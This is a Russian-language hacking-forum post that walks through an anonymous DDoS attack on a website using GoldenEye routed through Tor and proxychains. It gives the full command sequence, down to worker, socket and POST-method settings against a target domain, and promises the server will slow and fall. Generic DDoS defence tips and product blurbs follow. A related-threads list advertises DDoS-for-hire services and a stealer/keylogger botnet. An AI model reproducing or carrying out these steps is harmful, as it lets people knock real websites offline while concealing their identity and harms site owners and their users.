Интересно Анонимная DDoS атака на веб-сайт с помощью GoldenEye и способы защиты

Denik

Original poster
Ufo Member
Сообщения
1 360
Реакции
1 408
Посетить сайт
1596195946900.png

Как работает данная атака и кто ей пользуется?

У каждого веб-сервера имеются ограничения по количеству запросов, которые веб-сервер может может обслуживать одновременно. Если количество запросов будет превышать допустимую норму — вполне возможно следующее:

  1. Замедление работы сервера (замедление обработки запросов)
  2. Полный отказ в обслуживании запросов
Чаще всего злоумышленники добиваются второго — полного отказа в обслуживании. Мотивы могут быть разными: начиная с защиты пользователей от мошеннических сайтов и заканчивая банальной скукой.

Но следует сказать, что пользуются данными атаками не только злоумышленники, но и «белые хакеры», т.е. пентестеры. Этой атакой этичные хакеры тестируют веб-сервера на мощность и способность обрабатывать большое количество запросов одновременно.

Работает DDoS так: злоумышленник создает сеть из «зомби-компьютеров» (на самом деле это не обязательно компьютеры: годными для данной атаки являются все устройства, способные отправлять запросы), и впоследствии использует эту сеть для проведения атаки.

Представим ситуацию: максимальный вес трафика, который может принимать сервер — 1 Гб. Злоумышленник пытается достичь или преодолеть этот барьер. Если получается — сервер сначала тормозит, а потом может и лечь

Чужие сервера ломать нельзя, за это могут быть проблемы законом. Мы тебя предупредили.

Необходимые инструменты

  1. EtherApe - графический монитор сети, который графически отображает сетевую активность. Хосты и ссылки меняются в размере с трафиком. Отображение цветовых протоколов.
  2. Service Tor - Tor позволяет клиентам и ретрансляторам предлагать скрытые услуги. То есть вы можете предложить веб-сервер, SSH-сервер и т.д. Не раскрывая свой IP-адрес своим пользователям.
  3. Proxychains - последняя версия Proxychains поддерживает SOCKS5, SOCKS4 и HTTP CONNECT. Прокси-цепи можно смешивать с разными типами прокси.
  4. GoldenEye - GoldenEye - приложение на python, предназначенное только для целей тестирования безопасности.
Как выполнить DDOS атаку на сайт?
  1. Запустите etherape: etherape, появится всплывающее окно, которое графически отображает сетевую активность.
  2. Запустите службу TOR: service tor start
  3. Загрузите Goldeneye

    Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.

    wget

    Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.

  4. После загрузки распакуйте его в папку unzip GoldenEye-master.zip
  5. Начать атаку /GoldenEye-master# proxychains ./goldeneye.py

    Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.

e99110128c9370d78d391.jpg

  • Добавьте значения для рабочих (-w), сокетов (-s) и метода (-m)
./goldeneye.py victim-website.com -w 100 -s 70 -m post

Если вы не остановите атаку, то в некоторых случаях она "взорвется". Чтобы остановить атаку просто нажмите CTRL+C.
Готово. Через какое-то время сервер будет тормозить, а затем, возможно, ляжет.

Общая защита от DDOS-атаки
  • Снижение скорости IP-соединения.
  • Используйте IDS, межсетевые экраны веб-приложений.
  • Tweak Connection на порог IP.
  • Защитите свои DNS-серверы.
  • Установите средства защиты. Убедитесь, что у вас установлены соответствующие средства защиты как для ваших сетей, так и для ваших приложений. Сюда входят такие ключевые инструменты, как брандмауэры, программное обеспечение для мониторинга сети и антивирусные программы, а также системы мониторинга угроз. С их помощью вы можете отслеживать базовый сетевой трафик и настраивать оповещения о необычном поведении.
  • Держите все в курсе. Все эти системы должны быть обновлены, чтобы гарантировать, что любые ошибки или проблемы исправлены. Обнаружение угроз как можно раньше - лучший способ предотвратить атаку DDoS-атак на важные сетевые инфраструктуры и повлиять на конечных пользователей.
Инструменты для предотвращения DDoS-атак
Есть несколько инструментов, которые я рекомендую для предотвращения и остановки DDoS-атак.

1. Security Event Manager

Для отслеживания поведения сети и маркировки угроз до того, как они станут чрезмерными, мне нравится SolarWinds Security Event Manager (SEM).

a0897cf3537a632f9035e.jpg

Способность быстро реагировать на угрозу жизненно необходима, поскольку инициативы в области безопасности могут быстро стать бесполезными, если их развертывание займет слишком много времени. SEM включает в себя автоматические ответы, которые могут блокировать подозрительный IP или USB, отключать вредоносные устройства или отключать их привилегии, а также уничтожать приложения, которые ведут себя неожиданным образом. Это означает, что задержки при работе с чем-то вроде атаки DDoS сводятся к минимуму.

SEM также контролирует целостность файлов и USB, поэтому, если что-то выглядит не так, его можно остановить.

SolarWinds SEM предлагается бесплатно для тридцатидневной пробной версии. После этого вы можете посмотреть цены для каждого узла.

2. Cloudflare

cf3c164b641b50b73be27.jpg

Cloudflare предлагает гибкий и масштабируемый инструмент, который объединяет несколько методов предотвращения DDoS в одном решении. Он предотвращает проникновение вредоносного и злонамеренного трафика в вашу сеть, а остальная часть сети остается функциональной и высокопроизводительной. Cloudflare использует базу данных репутации для отслеживания потенциальных угроз от злоумышленников.

Для предприятий Cloudflare стоит 200 долларов США в месяц, но на уровне предприятия вам необходимо связаться с Cloudflare для получения расценок.

3. Imperva

9cb19ae7a79bed6b1ffed.jpg

Средство защиты Imperva DDoS защищает всю сеть и защищает от атак с помощью обработки пакетов большой емкости. Он обеспечивает защиту от DDoS-атак как всегда, так и по требованию, в зависимости от того, что больше всего подходит вашему бизнесу, а также включает в себя автоматическое обновление панелей мониторинга, отображающих информацию о трафике атак. Основным недостатком инструмента Imperva является то, что он ограничен защитой от DDoS-атак.
 
Название темы
Автор Заголовок Раздел Ответы Дата
Admin Отказ от обслуживания. Анонимная DDoS атака на веб-сайт с помощью GoldenEye и способы защиты Полезные статьи 1
DarkXPhone Проверено DarkXPhone | Анонимная VOIP Телефония под любые направления | SIP | VOIP | Продажа софта 2
PaymentBM Анонимная платежная система - Black Money Финансы - биллинги, банки, кошельки, логи 9
Р Интересно Анонимная отправка грузов мануал Способы заработка 0
H Анонимная цепь Анонимность и приватность 0
N Анонимная регистрация кошельков с отключением смс подтверждения Полезные статьи 13
V Ожидает оплаты Venom DDoS attack Спам / Флуд / Ддос 0
Emilio_Gaviriya Статья Как работает Анти-DDoS. Уязвимости и взлом 0
Kevin_attack Ожидает оплаты KEVIN DDOS SERVICE / ATTACKS FROM ANOTHER DIMENSION Спам / Флуд / Ддос 0
M Ожидает оплаты DDoS - attacks Ищу работу. Предлагаю свои услуги. 1
Support81 Победителей не будет: авторы Tor вступают в неравный бой с DDoS-атаками Новости в сети 0
Support81 CISA заявило о DDoS-атаках: хакеры хотят дестабилизировать ситуацию в мире Новости в сети 0
N ✅ (РЕКОМЕНДУЮ) №1 >>>DDos Атака<<|>>DDoS Service<<< ДДОС СЕРВИС<<|>>Заказать DDOS ✅ Ищу работу. Предлагаю свои услуги. 2
Shainy На проверке Shainy DDoS Service / Заказать DDOS услуги по приятной цене.Купить DDOS атаку.DDOS Услуги. / 24/7 / Гарант. Ищу работу. Предлагаю свои услуги. 1
S Scrooge_service! DDOS нового уровня! Корзина 2
D нужна услуга по атаку спам флуд DDos по адекватной ценеб плочу BTC Вопросы и интересы 1
V Закрыто Virtyal Attack Service DDoS!Заказать Атаку на Сайт!Качество/Гарантия/Анонимность! Корзина 1
F Закрыто Заказать DDOS услуги по адекватной цене. Купить DDOS атаку. DDOS Услуги. Ддос за крипту Корзина 1
C Layer 4 DDOS Tool Python Спам / Флуд / Ддос 0
X ИЩЕМ ЛУЧШИЙ В МИРЕ СЕРВИС ПО ПРЕДОСТАВЛЕНИЮ ЗАЩИТЫ В КЛИРНЕТ И ONION ОТ ЛЮБЫХ DDOS АТАК! Предоставляю работу. Ищу специалиста. 1
Ddoscrabs Продавец Premium ddos от Crabs Спам / Флуд / Ддос 17
G Интересно Самый бюджетный DDoS сервис Уязвимости и взлом 1
M Закрыто top-class DDoS service Корзина 1
G ✅Recommend✅ Innovative Technologies off Ddos Service. Ищу работу. Предлагаю свои услуги. 1
J [Service] DDoS Услуги Спам / Флуд / Ддос 3
W Проверено Service DDOS Attack DDOS Атака на заказ. Работаем 24/7 from WEB503 Спам / Флуд / Ддос 3
D ---->Daddy DDoS Service <----- | Устрани конкурента | Лучшие на рынке! Спам / Флуд / Ддос 1
E Проверено Online Service DDoS attack/Заказ Ddos услуг круглосуточно. Спам / Флуд / Ддос 2
A Интересно CasT-Security.ru Приватная защита от DDoS-атак Ищу работу. Предлагаю свои услуги. 0
Antonka_1000 У кого нибудь прога для DDOS'а серверов CS1.6???? Вопросы и интересы 4
turbion0 Проверено DDOS от ↯Turbion Service↯ Спам / Флуд / Ддос 1
S Куплю приватный ботнет для DDOS атак Куплю/Продам 0
D [Service]MASSIVE DDOS/ Мгновенное тестирование вашего ресурса. Ищу работу. Предлагаю свои услуги. 8
S Service DDOS Attack/ДДОС Атака на заказ. Профессионалы к вашим услугам. Спам / Флуд / Ддос 2
G Аренда DDOS мощностей с помесячной оплатой,хватит переплачивать псевдо ддосерам.(V 1.0) Спам / Флуд / Ддос 2
jsbypass >>> DDOS-SERVICE <<< | ЗАКАЗАТЬ ДДОС | ДДОС НА ЗАКАЗ Ищу работу. Предлагаю свои услуги. 2
0 Проверено DDoS Stresser|Best Layer7 Power| Устрани своего конкурента| Спам / Флуд / Ддос 28
D DDoS SerVice #1(Устраняем ваших конкурентов) Ищу работу. Предлагаю свои услуги. 0
J Предлагаю вам качественные услуги DDoS Attack Спам / Флуд / Ддос 1
NickelBlack DDOS SYN Flood Spam/DDOS/Malware 3
D Положим (сделаем недоступным) сайт! Ddos-сервис к вашим услугам! Проведём мощную ддос-атаку, устраним конкурентов легко и быстро! Спам / Флуд / Ддос 1
S Как защитить сайт от DDos Атак? Вопросы и интересы 2
N Предоставляю услуги по устранению сайтов и серверов с помощью DDOS атак.Наш сервис поможет решить ваши проблемы с конкурентами. Спам / Флуд / Ддос 0
S Продам SpideHost - Абузоустойчивые VPS/VDS + VIP FastFlux, MassScan, DDOS, AntiDDOS Сайты/Хостинг/Сервера 0
NickelBlack BlackNET Botnet v3.5 [Stealer+Keylogger+DDOS] .NET 24
L Интересно Участник «Сколково» защитит МТ5-брокеров от DDoS-атак Новости в сети 0
D Обучение DDos Вопросы и интересы 0
Denik Интересно DDOS сайта при использовании WordPress Уязвимости и взлом 1
L Интересно Домены биржи Binance подверглись DDoS-атаке Новости в сети 0
АнАлЬнАя ЧуПаКаБрА INLINE ddos сайта Проекты Private Keeper 5

Название темы